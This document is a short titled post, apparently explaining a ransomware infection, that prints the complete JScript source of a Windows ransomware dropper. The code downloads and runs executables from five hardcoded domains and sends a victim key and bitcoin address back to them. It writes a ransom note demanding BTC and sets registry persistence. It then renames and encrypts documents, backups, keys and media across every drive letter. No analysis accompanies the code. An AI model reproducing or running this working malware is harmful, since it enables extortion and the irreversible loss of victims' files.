here's how you were forced to pay bitcoin to decrypt your fi

1. var id = "rWwA9ZWwhFvuBvdhjjSAHdk_5gzrJKrneBD21TBrfdLbh-T-JKWIz4sQ5QGAlALQF5tJHu8QcUkLXBFXXQ";
2. var ad = "13CBPRrF8micWLhGmY89jv8Zy85XkuxyBb";
3. var bc = "0.50508";
4. var ld = 0;
5. var ky = Math.random().toString(36).substr(2, 9) + Math.random().toString(36).substr(2, 9) + Math.random().toString(36).substr(2, 9) + Math.random().toString(36).substr(2, 9);
6. var cq = String.fromCharCode(34);
7. var cs = String.fromCharCode(92);
8. var ll = ["successcoachguru.com", "woodworking.se", "doctorentertainment.com", "www.area98.co.uk", "professional64.ru"];
9. var ws = WScript.CreateObject("WScript.Shell");
10. var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a";
11. var xo = WScript.CreateObject("Msxml2.XMLHTTP");
12. var xa = WScript.CreateObject("ADODB.Stream");
13. var fo = WScript.CreateObject("Scripting.FileSystemObject");
14. if (!fo.FileExists(fn + ".txt")) {
15.   for (var n = 0; n <= 2; n++) {
16.     for (var i = ld; i < ll.length; i++) {
17.       var dn = 0;
18.       try {
19.         xo.open("GET", "http://" + ll[i] + "/counter/?ad=" + ad + "&ky=" + ky + "&id=" + id + "&rnd=" + i + n, false);
20.         xo.send();
21.         if (xo.status == 200) {
22.           xa.open();
23.           xa.type = 1;
24.           xa.write(xo.responseBody);
25.           if (xa.size > 1000) {
26.             dn = 1;
27.             xa.saveToFile(fn + n + ".exe", 2);
28.             if (n != 0) {
29.               try {
30.                 ws.Run(fn + n + ".exe", 1, 0);
31.               } catch (er) {};
32.             };
33.           };
34.           xa.close();
35.         };
36.         if (dn == 1) {
37.           ld = i;
38.           break;
39.         };
40.       } catch (er) {};
41.     };
42.   };
43.   if (fo.FileExists(fn + "0.exe")) {
44.     xo.open("GET", "http://" + ll[ld] + "/counter/?ad=" + ad + "&ky=" + ky + "&id=" + id + "&st=start", false);
45.     xo.send();
46.     var fp = fo.CreateTextFile(fn + ".txt", true);
47.     fp.WriteLine("ATTENTION!");
48.     fp.WriteLine("");
49.     fp.WriteLine("All your documents, photos, databases and other important personal files");
50.     fp.WriteLine("were encrypted using strong RSA-1024 algorithm with a unique key.");
51.     fp.WriteLine("To restore your files you have to pay " + bc + " BTC (bitcoins).");
52.     fp.WriteLine("Please follow this manual:");
53.     fp.WriteLine("");
54.     fp.WriteLine("1. Create Bitcoin wallet here:");
55.     fp.WriteLine("");
56.     fp.WriteLine("      https://blockchain.info/wallet/new");
57.     fp.WriteLine("");
58.     fp.WriteLine("2. Buy " + bc + " BTC with cash, using search here:");
59.     fp.WriteLine("");
60.     fp.WriteLine("      https://localbitcoins.com/buy_bitcoins");
61.     fp.WriteLine("");
62.     fp.WriteLine("3. Send " + bc + " BTC to this Bitcoin address:");
63.     fp.WriteLine("");
64.     fp.WriteLine("      " + ad);
65.     fp.WriteLine("");
66.     fp.WriteLine("4. Open one of the following links in your browser to download decryptor:");
67.     fp.WriteLine("");
68.     for (var i = 0; i < ll.length; i++) {
69.       fp.WriteLine("      http://" + ll[i] + "/counter/?a=" + ad);
70.     };
71.     fp.WriteLine("");
72.     fp.WriteLine("5. Run decryptor to restore your files.");
73.     fp.WriteLine("");
74.     fp.WriteLine("PLEASE REMEMBER:");
75.     fp.WriteLine("");
76.     fp.WriteLine("      - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.");
77.     fp.WriteLine("      - Nobody can help you except us.");
78.     fp.WriteLine("      - It`s useless to reinstall Windows, update antivirus software, etc.");
79.     fp.WriteLine("      - Your files can be decrypted only after you make payment.");
80.     fp.WriteLine("      - You can find this manual on your desktop (DECRYPT.txt).");
81.     fp.Close();
82.     ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCU" + cs + "SOFTWARE" + cs + "Microsoft" + cs + "Windows" + cs + "CurrentVersion" + cs + "Run" + cq + " /V " + cq + "Crypted" + cq + " /t REG_SZ /F /D " + cq + fn + ".txt" + cq, 0, 0);
83.     ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCR" + cs + ".crypted" + cq + " /ve /t REG_SZ /F /D " + cq + "Crypted" + cq, 0, 0);
84.     ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCR" + cs + "Crypted" + cs + "shell" + cs + "open" + cs + "command" + cq + " /ve /t REG_SZ /F /D " + cq + "notepad.exe " + cs + cq + fn + ".txt" + cs + cq + cq, 0, 0);
85.     ws.Run("%COMSPEC% /c copy /y " + cq + fn + ".txt" + cq + " " + cq + "%AppData%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0);
86.     ws.Run("%COMSPEC% /c copy /y " + cq + fn + ".txt" + cq + " " + cq + "%UserProfile%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0);
87.     for (var i = 67; i <= 90; i++) {
88.       ws.Run("%COMSPEC% /c for /r " + cq + String.fromCharCode(i) + ":" + cs + cq + " %i in (*.zip *.rar *.r00 *.r01 *.r02 *.r03 *.7z *.tar *.gz *.gzip *.arc *.arj *.bz *.bz2 *.bza *.bzip *.bzip2 *.ice *.xls *.xlsx *.doc *.docx *.pdf *.djvu *.fb2 *.rtf *.ppt *.pptx *.pps *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.class *.py *.pl *.h *.vb *.vcproj *.vbproj *.java *.bak *.backup *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.sql *.psd *.eps *.cdr *.cpt *.indd *.dwg *.ai *.svg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.jpeg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.mov *.3gp *.flv *.mkv *.vob *.rm *.mp3 *.wav *.asf *.wma *.m3u *.midi *.ogg *.mid *.vdi *.vmdk *.vhd *.dsk *.img *.iso) do (REN " + cq + "%i" + cq + " " + cq + "%~nxi.crypted" + cq + " & call " + fn + "0.exe " + cq + "%i.crypted" + cq + " " + ky + ")", 1, 1);
89.     };
90.     ws.Run("%COMSPEC% /c notepad.exe " + cq + fn + ".txt" + cq, 0, 0);
91.     xo.open("GET", "http://" + ll[ld] + "/counter/?ad=" + ad + "&ky=" + ky + "&id=" + id + "&st=done", false);
92.     xo.send();
93.   };
94. };